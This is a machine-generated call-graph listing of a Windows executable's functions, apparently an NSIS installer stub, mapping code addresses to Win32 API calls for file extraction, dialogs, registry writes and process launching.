4205->4206 4207 405d0d 4205->4207 4208 405c77 ReadFile 4206->4208 4207->4194 4209 405cfd 4208->4209 4209->4207 4210 405d16 SetFilePointer 4209->4210 4211 405d3e SetFilePointer 4209->4211 4210->4211 4212 405d21 4210->4212 4211->4207 4213 405ca6 WriteFile 4212->4213 4213->4207 4214->4204 3165 401e66 3166 402bbf 19 API calls 3165->3166 3167 401e6c 3166->3167 3168 40517e 26 API calls 3167->3168 3169 401e76 3168->3169 3183 4056ff CreateProcessW 3169->3183 3172 401edb CloseHandle 3176 40281e 3172->3176 3173 401e8c WaitForSingleObject 3174 401e9e 3173->3174 3175 401eb0 GetExitCodeProcess 3174->3175 3186 406431 3174->3186 3178 401ec2 3175->3178 3179 401ecf 3175->3179 3190 405f66 wsprintfW 3178->3190 3179->3172 3182 401ecd 3179->3182 3182->3172 3184 405732 CloseHandle 3183->3184 3185 401e7c 3183->3185 3184->3185 3185->3172 3185->3173 3185->3176 3187 40644e PeekMessageW 3186->3187 3188 406444 DispatchMessageW 3187->3188 3189 401ea5 WaitForSingleObject 3187->3189 3188->3187 3189->3174 3190->3182 3191 401767 3192 402bbf 19 API calls 3191->3192 3193 40176e 3192->3193 3194 401796 3193->3194 3195 40178e 3193->3195 3255 40601f lstrcpynW 3194->3255 3254 40601f lstrcpynW 3195->3254 3198 401794 3202 4062b3 5 API calls 3198->3202 3199 4017a1 3256 4059d3 lstrlenW CharPrevW 3199->3256 3209 4017b3 3202->3209 3206 4017c5 CompareFileTime 3206->3209 3207 401885 3208 40517e 26 API calls 3207->3208 3210 40188f 3208->3210 3209->3206 3209->3207 3212 40601f lstrcpynW 3209->3212 3216 406041 19 API calls 3209->3216 3226 40185c 3209->3226 3229 405bcf GetFileAttributesW 3209->3229 3232 405bf4 GetFileAttributesW CreateFileW 3209->3232 3259 406362 FindFirstFileW 3209->3259 3262 405764 3209->3262 3233 403027 3210->3233 3211 40517e 26 API calls 3228 401871 3211->3228 3212->3209 3215 4018b6 SetFileTime 3217 4018c8 CloseHandle 3215->3217 3216->3209 3218 4018d9 3217->3218 3217->3228 3219 4018f1 3218->3219 3220 4018de 3218->3220 3222 406041 19 API calls 3219->3222 3221 406041 19 API calls 3220->3221 3224 4018e6 lstrcatW 3221->3224 3225 4018f9 3222->3225 3224->3225 3227 405764 MessageBoxIndirectW 3225->3227 3226->3211 3226->3228 3227->3228 3230 405be1 SetFileAttributesW 3229->3230 3231 405bee 3229->3231 3230->3231 3231->3209 3232->3209 3235 403040 3233->3235 3234 40306b 3266 40320c 3234->3266 3235->3234 3279 403222 SetFilePointer 3235->3279 3239 403088 GetTickCount 3250 40309b 3239->3250 3240 4031ac 3241 4031b0 3240->3241 3246 4031c8 3240->3246 3243 40320c ReadFile 3241->3243 3242 4018a2 3242->3215 3242->3217 3243->3242 3244 40320c ReadFile 3244->3246 3245 40320c ReadFile 3245->3250 3246->3242 3246->3244 3247 405ca6 WriteFile 3246->3247 3247->3246 3249 403101 GetTickCount 3249->3250 3250->3242 3250->3245 3250->3249 3251 40312a MulDiv wsprintfW 3250->3251 3269 406534 3250->3269 3277 405ca6 WriteFile 3250->3277 3252 40517e 26 API calls 3251->3252 3252->3250 3254->3198 3255->3199 3257 4017a7 lstrcatW 3256->3257 3258 4059ef lstrcatW 3256->3258 3257->3198 3258->3257 3260 406383 3259->3260 3261 406378 FindClose 3259->3261 3260->3209 3261->3260 3263 405779 3262->3263 3264 4057c5 3263->3264 3265 40578d MessageBoxIndirectW 3263->3265 3264->3209 3265->3264 3280 405c77 ReadFile 3266->3280 3270 406559 3269->3270 3271 406561 3269->3271 3270->3250 3271->3270 3272 4065f1 GlobalAlloc 3271->3272 3273 4065e8 GlobalFree 3271->3273 3275 406668 GlobalAlloc 3271->3275 3276 40665f GlobalFree 3271->3276 3272->3270 3274 406605 3272->3274 3273->3272 3274->3271 3275->3270 3275->3271 3276->3275 3278 405cc4 3277->3278 3278->3250 3279->3234 3281 403076 3280->3281 3281->3239 3281->3240 3281->3242 4215 401ee9 4216 402bbf 19 API calls 4215->4216 4217 401ef0 4216->4217 4218 406362 2 API calls 4217->4218 4219 401ef6 4218->4219 4221 401f07 4219->4221 4222 405f66 wsprintfW 4219->4222 4222->4221 3294 40326a SetErrorMode GetVersion 3295 40329e 3294->3295 3296 4032a4 3294->3296 3298 4063f5 5 API calls 3295->3298 3385 406389 GetSystemDirectoryW 3296->3385 3298->3296 3299 4032bb 3300 406389 3 API calls 3299->3300 3301 4032c5 3300->3301 3302 406389 3 API calls 3301->3302 3303 4032cf 3302->3303 3388 4063f5 GetModuleHandleA 3303->3388 3306 4063f5 5 API calls 3307 4032dd #17 OleInitialize SHGetFileInfoW 3306->3307 3394 40601f lstrcpynW 3307->3394 3309 40331a GetCommandLineW 3395 40601f lstrcpynW 3309->3395 3311 40332c GetModuleHandleW 3312 403344 3311->3312 3313 405a00 CharNextW 3312->3313 3314 403353 CharNextW 3313->3314 3315 40347e GetTempPathW 3314->3315 3324 40336c 3314->3324 3396 403239 3315->3396 3317 403496 3318 4034f0 DeleteFileW 3317->3318 3319 40349a GetWindowsDirectoryW lstrcatW 3317->3319 3406 402dee GetTickCount GetModuleFileNameW 3318->3406 3320 403239 12 API calls 3319->3320 3323 4034b6 3320->3323 3321 405a00 CharNextW 3321->3324 3323->3318 3326 4034ba GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3323->3326 3324->3321 3330 403469 3324->3330 3331 403467 3324->3331 3325 403504 3327 4035b7 3325->3327 3332 4035a7 3325->3332 3336 405a00 CharNextW 3325->3336 3329 403239 12 API calls 3326->3329 3507 40378e 3327->3507 3334 4034e8 3329->3334 3490 40601f lstrcpynW 3330->3490 3331->3315 3434 403868 3332->3434 3334->3318 3334->3327 3349 403523 3336->3349 3338 4036f2 3341 403776 ExitProcess 3338->3341 3342 4036fa GetCurrentProcess OpenProcessToken 3338->3342 3339 4035d2 3340 405764 MessageBoxIndirectW 3339->3340 3344 4035e0 ExitProcess 3340->3344 3347 403712 LookupPrivilegeValueW AdjustTokenPrivileges 3342->3347 3348 403746 3342->3348 3345 403581 3491 405adb 3345->3491 3346 4035e8 3514 4056e7 3346->3514 3347->3348 3352 4063f5 5 API calls 3348->3352 3349->3345 3349->3346 3355 40374d 3352->3355 3358 403762 ExitWindowsEx 3355->3358 3359 40376f 3355->3359 3356 403609 lstrcatW lstrcmpiW 3356->3327 3361 403625 3356->3361 3357 4035fe lstrcatW 3357->3356 3358->3341 3358->3359 3531 40140b 3359->3531 3364 403631 3361->3364 3365 40362a 3361->3365 3363 40359c 3506 40601f lstrcpynW 3363->3506 3522 4056ca CreateDirectoryW 3364->3522 3517 40564d CreateDirectoryW 3365->3517 3369 403636 SetCurrentDirectoryW 3371 403651 3369->3371 3372 403646 3369->3372 3526 40601f lstrcpynW 3371->3526 3525 40601f lstrcpynW 3372->3525 3375 406041 19 API calls 3376 403690 DeleteFileW 3375->3376 3377 40369d CopyFileW 3376->3377 3382 40365f 3376->3382 3377->3382 3378 4036e6 3379 405ec0 39 API calls 3378->3379 3379->3327 3381 406041 19 API calls 3381->3382 3382->3375 3382->3378 3382->3381 3383 4056ff 2 API calls 3382->3383 3384 4036d1 CloseHandle 3382->3384 3527 405ec0 MoveFileExW 3382->3527 3383->3382 3384->3382 3386 4063ab wsprintfW LoadLibraryW 3385->3386 3386->3299 3389 406411 3388->3389 3390 40641b GetProcAddress 3388->3390 3391 406389 3 API calls 3389->3391 3392 4032d6 3390->3392 3393 406417 3391->3393 3392->3306 3393->3390 3393->3392 3394->3309 3395->3311 3397 4062b3 5 API calls 3396->3397 3398 403245 3397->3398 3399 40324f 3398->3399 3400 4059d3 3 API calls 3398->3400 3399->3317 3401 403257 3400->3401 3402 4056ca 2 API calls 3401->3402 3403 40325d 3402->3403 3534 405c23 3403->3534 3538 405bf4 GetFileAttributesW CreateFileW 3406->3538 3408 402e2e 3432 402e3e 3408->3432 3539 40601f lstrcpynW 3408->3539 3410 402e54 3540 405a1f lstrlenW 3410->3540 3414 402e65 GetFileSize 3415 402f61 3414->3415 3433 402e7c 3414->3433 3545 402d8a 3415->3545 3417 402f6a 3419 402f9a GlobalAlloc 3417->3419 3417->3432 3557 403222 SetFilePointer 3417->3557 3418 40320c ReadFile 3418->3433 3556 403222 SetFilePointer 3419->3556 3421 402fcd 3425 402d8a 6 API calls 3421->3425 3423 402f83 3426 40320c ReadFile 3423->3426 3424 402fb5 3427 403027 37 API calls 3424->3427 3425->3432 3428 402f8e 3426->3428 3430 402fc1 3427->3430 3428->3419 3428->3432 3429 402d8a 6 API calls 3429->3433 3430->3430 3431 402ffe SetFilePointer 3430->3431 3430->3432 3431->3432 3432->3325 3433->3415 3433->3418 3433->3421 3433->3429 3433->3432 3435 4063f5 5 API calls 3434->3435 3436 40387c 3435->3436 3437 403882 3436->3437 3438 403894 3436->3438 3567 405f66 wsprintfW 3437->3567 3439 405eec 3 API calls 3438->3439 3440 4038c4 3439->3440 3442 4038e3 lstrcatW 3440->3442 3444 405eec 3 API calls 3440->3444 3443 403892 3442->3443 3558 403b3e 3443->3558 3444->3442 3447 405adb 18 API calls 3448 403915 3447->3448 3449 4039a9 3448->3449 3451 405eec 3 API calls 3448->3451 3450 405adb 18 API calls 3449->3450 3452 4039af 3450->3452 3453 403947 3451->3453 3454 4039bf LoadImageW 3452->3454 3455 406041 19 API calls 3452->3455 3453->3449 3458 403968 lstrlenW 3453->3458 3461 405a00 CharNextW 3453->3461 3456 403a65 3454->3456 3457 4039e6 RegisterClassW 3454->3457 3455->3454 3460 40140b 2 API calls 3456->3460 3459 403a1c SystemParametersInfoW CreateWindowExW 3457->3459 3489 403a6f 3457->3489 3462 403976 lstrcmpiW 3458->3462 3463 40399c 3458->3463 3459->3456 3464 403a6b 3460->3464 3466 403965 3461->3466 3462->3463 3467 403986 GetFileAttributesW 3462->3467 3465 4059d3 3 API calls 3463->3465 3468 403b3e 20 API calls 3464->3468 3464->3489 3469 4039a2 3465->3469 3466->3458 3470 403992 3467->3470 3472 403a7c 3468->3472 3568 40601f lstrcpynW 3469->3568 3470->3463 3471 405a1f 2 API calls 3470->3471 3471->3463 3474 403a88 ShowWindow 3472->3474 3475 403b0b 3472->3475 3477 406389 3 API calls 3474->3477 3569 405251 OleInitialize 3475->3569 3479 403aa0 3477->3479 3478 403b11 3480 403b15 3478->3480 3481 403b2d 3478->3481 3482 403aae GetClassInfoW 3479->3482 3484 406389 3 API calls 3479->3484 3487 40140b 2 API calls 3480->3487 3480->3489 3483 40140b 2 API calls 3481->3483 3485 403ac2 GetClassInfoW RegisterClassW 3482->3485 3486 403ad8 DialogBoxParamW 3482->3486 3483->3489 3484->3482 3485->3486 3488 40140b 2 API calls 3486->3488 3487->3489 3488->3489 3489->3327 3490->3331 3584 40601f lstrcpynW 3491->3584 3493 405aec 3585 405a7e CharNextW CharNextW 3493->3585 3496 40358d 3496->3327 3505 40601f lstrcpynW 3496->3505 3497 4062b3 5 API calls 3503 405b02 3497->3503 3498 405b33 lstrlenW 3499 405b3e 3498->3499 3498->3503 3501 4059d3 3 API calls 3499->3501 3500 406362 2 API calls 3500->3503 3502 405b43 GetFileAttributesW 3501->3502 3502->3496 3503->3496 3503->3498 3503->3500 3504 405a1f 2 API calls 3503->3504 3504->3498 3505->3363 3506->3332 3508 4037a6 3507->3508 3509 403798 CloseHandle 3507->3509 3591 4037d3 3508->3591 3509->3508 3515 4063f5 5 API calls 3514->3515 3516 4035ed lstrcatW 3515->3516 3516->3356 3516->3357 3518 40362f 3517->3518 3519 40569e GetLastError 3517->3519 3518->3369 3519->3518 3520 4056ad SetFileSecurityW 3519->3520 3520->3518 3521 4056c3 GetLastError 3520->3521 3521->3518 3523 4056da 3522->3523 3524 4056de GetLastError 3522->3524 3523->3369 3524->3523 3525->3371 3526->3382 3528 405ee1 3527->3528 3529 405ed4 3527->3529 3528->3382 3644 405d4e lstrcpyW 3529->3644 3532 401389 2 API calls 3531->3532 3533 401420 3532->3533 3533->3341 3535 405c30 GetTickCount GetTempFileNameW 3534->3535 3536 405c66 3535->3536 3537 403268 3535->3537 3536->3535 3536->3537 3537->3317 3538->3408 3539->3410 3541 405a2d 3540->3541 3542 405a33 CharPrevW 3541->3542 3543 402e5a 3541->3543 3542->3541 3542->3543 3544 40601f lstrcpynW 3543->3544 3544->3414 3546 402d93 3545->3546 3547 402dab 3545->3547 3548 402da3 3546->3548 3549 402d9c DestroyWindow 3546->3549 3550 402db3 3547->3550 3551 402dbb GetTickCount 3547->3551 3548->3417 3549->3548 3552 406431 2 API calls 3550->3552 3553 402dc9 CreateDialogParamW ShowWindow 3551->3553 3554 402dec 3551->3554 3555 402db9 3552->3555 3553->3554 3554->3417 3555->3417 3556->3424 3557->3423 3559 403b52 3558->3559 3576 405f66 wsprintfW 3559->3576 3561 403bc3 3562 406041 19 API calls 3561->3562 3563 403bcf SetWindowTextW 3562->3563 3564 4038f3 3563->3564 3565 403beb 3563->3565 3564->3447 3565->3564 3566 406041 19 API calls 3565->3566 3566->3565 3567->3443 3568->3449 3577 40412f 3569->3577 3571 405274 3575 40529b 3571->3575 3580 401389 3571->3580 3572 40412f SendMessageW 3573 4052ad OleUninitialize 3572->3573 3573->3478 3575->3572 3576->3561 3578 404147 3577->3578 3579 404138 SendMessageW 3577->3579 3578->3571 3579->3578 3582 401390 3580->3582 3581 4013fe 3581->3571 3582->3581 3583 4013cb MulDiv SendMessageW 3582->3583 3583->3582 3584->3493 3587 405a9b 3585->3587 3589 405aad 3585->3589 3586 405ad1 3586->3496 3586->3497 3588 405aa8 CharNextW 3587->3588 3587->3589 3588->3586 3589->3586 3590 405a00 CharNextW 3589->3590 3590->3589 3592 4037e1 3591->3592 3593 4037ab 3592->3593 3594 4037e6 FreeLibrary GlobalFree 3592->3594 3595 405810 3593->3595 3594->3593 3594->3594 3596 405adb 18 API calls 3595->3596 3597 405830 3596->3597 3598 405838 DeleteFileW 3597->3598 3599 40584f 3597->3599 3600 4035c0 OleUninitialize 3598->3600 3605 40596f 3599->3605 3634 40601f lstrcpynW 3599->3634 3600->3338 3600->3339 3602 405875 3603 405888 3602->3603 3604 40587b lstrcatW 3602->3604 3608 405a1f 2 API calls 3603->3608 3607 40588e 3604->3607 3605->3600 3606 406362 2 API calls 3605->3606 3609 405994 3606->3609 3610 40589e lstrcatW 3607->3610 3611 4058a9 lstrlenW FindFirstFileW 3607->3611 3608->3607 3609->3600 3612 405998 3609->3612 3610->3611 3611->3605 3619 4058cb 3611->3619 3613 4059d3 3 API calls 3612->3613 3614 40599e 3613->3614 3616 4057c8 5 API calls 3614->3616 3615 405952 FindNextFileW 3615->3619 3620 405968 FindClose 3615->3620 3618 4059aa 3616->3618 3621 4059c4 3618->3621 3622 4059ae 3618->3622 3619->3615 3628 405913 3619->3628 3635 40601f lstrcpynW 3619->3635 3620->3605 3624 40517e 26 API calls 3621->3624 3622->3600 3625 40517e 26 API calls 3622->3625 3624->3600 3627 4059bb 3625->3627 3626 405810 63 API calls 3626->3628 3630 405ec0 39 API calls 3627->3630 3628->3615 3628->3626 3629 40517e 26 API calls 3628->3629 3631 40517e 26 API calls 3628->3631 3633 405ec0 39 API calls 3628->3633 3636 4057c8 3628->3636 3629->3615 3632 4059c2 3630->3632 3631->3628 3632->3600 3633->3628 3634->3602 3635->3619 3637 405bcf 2 API calls 3636->3637 3638 4057d4 3637->3638 3639 4057f5 3638->3639 3640 4057e3 RemoveDirectoryW 3638->3640 3641 4057eb DeleteFileW 3638->3641 3639->3628 3642 4057f1 3640->3642 3641->3642 3642->3639 3643 405801 SetFileAttributesW 3642->3643 3643->3639 3645 405d76 3644->3645 3646 405d9c GetShortPathNameW 3644->3646 3671 405bf4 GetFileAttributesW CreateFileW 3645->3671 3647 405db1 3646->3647 3648 405ebb 3646->3648 3647->3648 3651 405db9 wsprintfA 3647->3651 3648->3528 3650 405d80 CloseHandle GetShortPathNameW 3650->3648 3652 405d94 3650->3652 3653 406041 19 API calls 3651->3653 3652->3646 3652->3648 3654 405de1 3653->3654 3672 405bf4 GetFileAttributesW CreateFileW 3654->3672 3656 405dee 3656->3648 3657 405dfd GetFileSize GlobalAlloc 3656->3657 3658 405eb4 CloseHandle 3657->3658 3659 405e1f 3657->3659 3658->3648 3660 405c77 ReadFile 3659->3660 3661 405e27 3660->3661 3661->3658 3673 405b59 lstrlenA 3661->3673 3664 405e52 3666 405b59 4 API calls 3664->3666 3665 405e3e lstrcpyA 3667 405e60 3665->3667 3666->3667 3668 405e97 SetFilePointer 3667->3668 3669 405ca6 WriteFile 3668->3669 3670 405ead GlobalFree 3669->3670 3670->3658 3671->3650 3672->3656 3674 405b9a lstrlenA 3673->3674 3675 405ba2 3674->3675 3676 405b73 lstrcmpiA 3674->3676 3675->3664 3675->3665 3676->3675 3677 405b91 CharNextA 3676->3677 3677->3674 4223 4021ea 4224 402bbf 19 API calls 4223->4224 4225 4021f0 4224->4225 4226 402bbf 19 API calls 4225->4226 4227 4021f9 4226->4227 4228 402bbf 19 API calls 4227->4228 4229 402202 4228->4229 4230 406362 2 API calls 4229->4230 4231 40220b 4230->4231 4232 40221c lstrlenW lstrlenW 4231->4232 4236 40220f 4231->4236 4234 40517e 26 API calls 4232->4234 4233 40517e 26 API calls 4237 402217 4233->4237 4235 40225a SHFileOperationW 4234->4235 4235->4236 4235->4237 4236->4233 4236->4237 4238 40156b 4239 401584 4238->4239 4240 40157b ShowWindow 4238->4240 4241 401592 ShowWindow 4239->4241 4242 402a4c 4239->4242 4240->4239 4241->4242 4250 40226e 4251 402275 4250->4251 4254 402288 4250->4254 4252 406041 19 API calls 4251->4252 4253 402282 4252->4253 4255 405764 MessageBoxIndirectW 4253->4255 4255->4254 4256 4014f1 SetForegroundWindow 4257 402a4c 4256->4257 3788 4050f2 3789 405102 3788->3789 3790 405116 3788->3790 3792 405108 3789->3792 3801 40515f 3789->3801 3791 40511e IsWindowVisible 3790->3791 3798 40513e 3790->3798 3794 40512b 3791->3794 3791->3801 3793 40412f SendMessageW 3792->3793 3796 405112 3793->3796 3802 404a48 SendMessageW 3794->3802 3795 405164 CallWindowProcW 3795->3796 3798->3795 3807 404ac8 3798->3807 3801->3795 3803 404aa7 SendMessageW 3802->3803 3804 404a6b GetMessagePos ScreenToClient SendMessageW 3802->3804 3806 404a9f 3803->3806 3805 404aa4 3804->3805 3804->3806 3805->3803 3806->3798 3816 40601f lstrcpynW 3807->3816 3809 404adb 3817 405f66 wsprintfW 3809->3817 3811 404ae5 3812 40140b 2 API calls 3811->3812 3813 404aee 3812->3813 3818 40601f lstrcpynW 3813->3818 3815 404af5 3815->3801 3816->3809 3817->3811 3818->3815 4258 401673 4259 402bbf 19 API calls 4258->4259 4260 40167a 4259->4260 4261 402bbf 19 API calls 4260->4261 4262 401683 4261->4262 4263 402bbf 19 API calls 4262->4263 4264 40168c MoveFileW 4263->4264 4265 401698 4264->4265 4266 40169f 4264->4266 4267 401423 26 API calls 4265->4267 4268 406362 2 API calls 4266->4268 4270 4021e1 4266->4270 4267->4270 4269 4016ae 4268->4269 4269->4270 4271 405ec0 39 API calls 4269->4271 4271->4265 4272 4041f7 lstrcpynW lstrlenW 3870 404afa GetDlgItem GetDlgItem 3871 404b4c 7 API calls 3870->3871 3874 404d65 3870->3874 3872 404be2 SendMessageW 3871->3872 3873 404bef DeleteObject 3871->3873 3872->3873 3875 404bf8 3873->3875 3877 404e49 3874->3877 3880 404e2a 3874->3880 3886 404dc5 3874->3886 3876 404c2f 3875->3876 3878 404c07 3875->3878 3881 4040e3 20 API calls 3876->3881 3882 404ef5 3877->3882 3888 4050dd 3877->3888 3893 404ea2 SendMessageW 3877->3893 3879 406041 19 API calls 3878->3879 3883 404c11 SendMessageW SendMessageW 3879->3883 3880->3877 3890 404e3b SendMessageW 3880->3890 3887 404c43 3881->3887 3884 404f07 3882->3884 3885 404eff SendMessageW 3882->3885 3883->3875 3895 404f20 3884->3895 3896 404f19 ImageList_Destroy 3884->3896 3903 404f30 3884->3903 3885->3884 3891 404a48 5 API calls 3886->3891 3892 4040e3 20 API calls 3887->3892 3889 40414a 8 API calls 3888->3889 3894 4050eb 3889->3894 3890->3877 3907 404dd6 3891->3907 3908 404c51 3892->3908 3893->3888 3898 404eb7 SendMessageW 3893->3898 3899 404f29 GlobalFree 3895->3899 3895->3903 3896->3895 3897 40509f 3897->3888 3904 4050b1 ShowWindow GetDlgItem ShowWindow 3897->3904 3901 404eca 3898->3901 3899->3903 3900 404d26 GetWindowLongW SetWindowLongW 3902 404d3f 3900->3902 3909 404edb SendMessageW 3901->3909 3905 404d45 ShowWindow 3902->3905 3906 404d5d 3902->3906 3903->3897 3914 404ac8 4 API calls 3903->3914 3921 404f6b 3903->3921 3904->3888 3925 404118 SendMessageW 3905->3925 3926 404118 SendMessageW 3906->3926 3907->3880 3908->3900 3910 404d20 3908->3910 3913 404ca1 SendMessageW 3908->3913 3916 404cdd SendMessageW 3908->3916 3917 404cee SendMessageW 3908->3917 3909->3882 3910->3900 3910->3902 3913->3908 3914->3921 3915 404d58 3915->3888 3916->3908 3917->3908 3918 405075 InvalidateRect 3918->3897 3919 40508b 3918->3919 3927 404a03 3919->3927 3920 404f99 SendMessageW 3924 404faf 3920->3924 3921->3920 3921->3924 3923 405023 SendMessageW SendMessageW 3923->3924 3924->3918 3924->3923 3925->3915 3926->3874 3930 40493a 3927->3930 3929 404a18 3929->3897 3931 404953 3930->3931 3932 406041 19 API calls 3931->3932 3933 4049b7 3932->3933 3934 406041 19 API calls 3933->3934 3935 4049c2 3934->3935 3936 406041 19 API calls 3935->3936 3937 4049d8 lstrlenW wsprintfW SetDlgItemTextW 3936->3937 3937->3929 4273 401cfa GetDlgItem GetClientRect 4274 402bbf 19 API calls 4273->4274 4275 401d2c LoadImageW SendMessageW 4274->4275 4276 401d4a DeleteObject 4275->4276 4277 402a4c 4275->4277 4276->4277 3938 4027fb 3939 402bbf 19 API calls 3938->3939 3940 402802 FindFirstFileW 3939->3940 3941 40282a 3940->3941 3945 402815 3940->3945 3942 402833 3941->3942 3946 405f66 wsprintfW 3941->3946 3947 40601f lstrcpynW 3942->3947 3946->3942 3947->3945 3948 40237b 3949 402381 3948->3949 3950 402bbf 19 API calls 3949->3950 3951 402393 3950->3951 3952 402bbf 19 API calls 3951->3952 3953 40239d RegCreateKeyExW 3952->3953 3954 4023c7 3953->3954 3955 402a4c 3953->3955 3956 4023e2 3954->3956 3957 402bbf 19 API calls 3954->3957 3958 4023ee 3956->3958 3960 402ba2 19 API calls 3956->3960 3959 4023d8 lstrlenW 3957->3959 3961 402409 RegSetValueExW 3958->3961 3962 403027 37 API calls 3958->3962 3959->3956 3960->3958 3963 40241f RegCloseKey 3961->3963 3962->3961 3963->3955 4278 40457e 4279 4045aa 4278->4279 4280 4045bb 4278->4280 4339 405748 GetDlgItemTextW 4279->4339 4282 4045c7 GetDlgItem 4280->4282 4284 404626 4280->4284 4283 4045db 4282->4283 4288 4045ef SetWindowTextW 4283->4288 4291 405a7e 4 API calls 4283->4291 4285 40470a 4284->4285 4293 406041 19 API calls 4284->4293 4337 4048b9 4284->4337 4285->4337 4341 405748 GetDlgItemTextW 4285->4341 4286 4045b5 4287 4062b3 5 API calls 4286->4287 4287->4280 4292 4040e3 20 API calls 4288->4292 4290 40414a 8 API calls 4295 4048cd 4290->4295 4296 4045e5 4291->4296 4297 40460b 4292->4297 4298 40469a SHBrowseForFolderW 4293->4298 4294 40473a 4299 405adb 18 API calls 4294->4299 4296->4288 4303 4059d3 3 API calls 4296->4303 4300 4040e3 20 API calls 4297->4300 4298->4285 4301 4046b2 CoTaskMemFree 4298->4301 4302 404740 4299->4302 4304 404619 4300->4304 4305 4059d3 3 API calls 4301->4305 4342 40601f lstrcpynW 4302->4342 4303->4288 4340 404118 SendMessageW 4304->4340 4307 4046bf 4305->4307 4310 4046f6 SetDlgItemTextW 4307->4310 4314 406041 19 API calls 4307->4314 4309 40461f 4312 4063f5 5 API calls 4309->4312 4310->4285 4311 404757 4313 4063f5 5 API calls 4311->4313 4312->4284 4320 40475e 4313->4320 4315 4046de lstrcmpiW 4314->4315 4315->4310 4317 4046ef lstrcatW 4315->4317 4316 40479f 4343 40601f lstrcpynW 4316->4343 4317->4310 4319 4047a6 4321 405a7e 4 API calls 4319->4321 4320->4316 4325 405a1f 2 API calls 4320->4325 4326 4047f7 4320->4326 4322 4047ac GetDiskFreeSpaceW 4321->4322 4324 4047d0 MulDiv 4322->4324 4322->4326 4324->4326 4325->4320 4327 404868 4326->4327 4329 404a03 22 API calls 4326->4329 4328 40488b 4327->4328 4330 40140b 2 API calls 4327->4330 4344 404105 EnableWindow 4328->4344 4331 404855 4329->4331 4330->4328 4333 40486a SetDlgItemTextW 4331->4333 4334 40485a 4331->4334 4333->4327 4335 40493a 22 API calls 4334->4335 4335->4327 4336 4048a7 4336->4337 4345 404513 4336->4345 4337->4290 4339->4286 4340->4309 4341->4294 4342->4311 4343->4319 4344->4336 4346 404521 4345->4346 4347 404526 SendMessageW 4345->4347 4346->4347 4347->4337 4348 4014ff 4349 401507 4348->4349 4351 40151a 4348->4351 4350 402ba2 19 API calls 4349->4350 4350->4351 4352 401000 4353 401037 BeginPaint GetClientRect 4352->4353 4354 40100c DefWindowProcW 4352->4354 4356 4010f3 4353->4356 4357 401179 4354->4357 4358 401073 CreateBrushIndirect FillRect DeleteObject 4356->4358 4359 4010fc 4356->4359 4358->4356 4360 401102 CreateFontIndirectW 4359->4360 4361 401167 EndPaint 4359->4361 4360->4361 4362 401112 6 API calls 4360->4362 4361->4357 4362->4361 4363 404280 4364 404298 4363->4364 4365 4043b2 4363->4365 4371 4040e3 20 API calls 4364->4371 4366 40441c 4365->4366 4368 4044ee 4365->4368 4374 4043ed GetDlgItem SendMessageW 4365->4374 4367 404426 GetDlgItem 4366->4367 4366->4368 4369 404440 4367->4369 4370 4044af 4367->4370 4373 40414a 8 API calls 4368->4373 4369->4370 4376 404466 6 API calls 4369->4376 4370->4368 4377 4044c1 4370->4377 4372 4042ff 4371->4372 4375 4040e3 20 API calls 4372->4375 4385 4044e9 4373->4385 4394 404105 EnableWindow 4374->4394 4379 40430c CheckDlgButton 4375->4379 4376->4370 4380 4044d7 4377->4380 4381 4044c7 SendMessageW 4377->4381 4392 404105 EnableWindow 4379->4392 4380->4385 4386 4044dd SendMessageW 4380->4386 4381->4380 4382 404417 4383 404513 SendMessageW 4382->4383 4383->4366 4386->4385 4387 40432a GetDlgItem 4393 404118 SendMessageW 4387->4393 4389 404340 SendMessageW 4390 404366 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4389->4390 4391 40435d GetSysColor 4389->4391 4390->4385 4391->4390 4392->4387 4393->4389 4394->4382 4402 401904 4403 40193b 4402->4403 4404 402bbf 19 API calls 4403->4404 4405 401940 4404->4405 4406 405810 70 API calls 4405->4406 4407 401949 4406->4407 4408 402d04 4409 402d16 SetTimer 4408->4409 4410 402d2f 4408->4410 4409->4410 4411 402d84 4410->4411 4412 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4410->4412 4412->4411 4413 402786 4414 4029f7 4413->4414 4415 40278d 4413->4415 4416 402ba2 19 API calls 4415->4416 4417 402798 4416->4417 4418 40279f SetFilePointer 4417->4418 4418->4414 4419 4027af 4418->4419 4421 405f66 wsprintfW 4419->4421 4421->4414 4422 401907 4423 402bbf 19 API calls 4422->4423 4424 40190e 4423->4424 4425 405764 MessageBoxIndirectW 4424->4425 4426 401917 4425->4426 3282 401e08 3283 402bbf 19 API calls 3282->3283 3284 401e0e 3283->3284 3285 402bbf 19 API calls 3284->3285 3286 401e17 3285->3286 3287 402bbf 19 API calls 3286->3287 3288 401e20 3287->3288 3289 402bbf 19 API calls 3288->3289 3290 401e29 3289->3290 3291 401423 26 API calls 3290->3291 3292 401e30 ShellExecuteW 3291->3292 3293 401e61 3292->3293 3694 403c0b 3695 403c23 3694->3695 3696 403d5e 3694->3696 3695->3696 3697 403c2f 3695->3697 3698 403daf 3696->3698 3699 403d6f GetDlgItem GetDlgItem 3696->3699 3700 403c3a SetWindowPos 3697->3700 3701 403c4d 3697->3701 3703 403e09 3698->3703 3711 401389 2 API calls 3698->3711 3702 4040e3 20 API calls 3699->3702 3700->3701 3705 403c52 ShowWindow 3701->3705 3706 403c6a 3701->3706 3707 403d99 SetClassLongW 3702->3707 3704 40412f SendMessageW 3703->3704 3725 403d59 3703->3725 3734 403e1b 3704->3734 3705->3706 3708 403c72 DestroyWindow 3706->3708 3709 403c8c 3706->3709 3710 40140b 2 API calls 3707->3710 3713 40408d 3708->3713 3714 403c91 SetWindowLongW 3709->3714 3715 403ca2 3709->3715 3710->3698 3712 403de1 3711->3712 3712->3703 3716 403de5 SendMessageW 3712->3716 3722 40409d ShowWindow 3713->3722 3713->3725 3714->3725 3719 403d4b 3715->3719 3720 403cae GetDlgItem 3715->3720 3716->3725 3717 40140b 2 API calls 3717->3734 3718 40406e DestroyWindow EndDialog 3718->3713 3774 40414a 3719->3774 3723 403cc1 SendMessageW IsWindowEnabled 3720->3723 3724 403cde 3720->3724 3722->3725 3723->3724 3723->3725 3727 403ceb 3724->3727 3728 403d32 SendMessageW 3724->3728 3729 403cfe 3724->3729 3739 403ce3 3724->3739 3726 406041 19 API calls 3726->3734 3727->3728 3727->3739 3728->3719 3731 403d06 3729->3731 3732 403d1b 3729->3732 3735 40140b 2 API calls 3731->3735 3736 40140b 2 API calls 3732->3736 3733 403d19 3733->3719 3734->3717 3734->3718 3734->3725 3734->3726 3737 4040e3 20 API calls 3734->3737 3755 403fae DestroyWindow 3734->3755 3765 4040e3 3734->3765 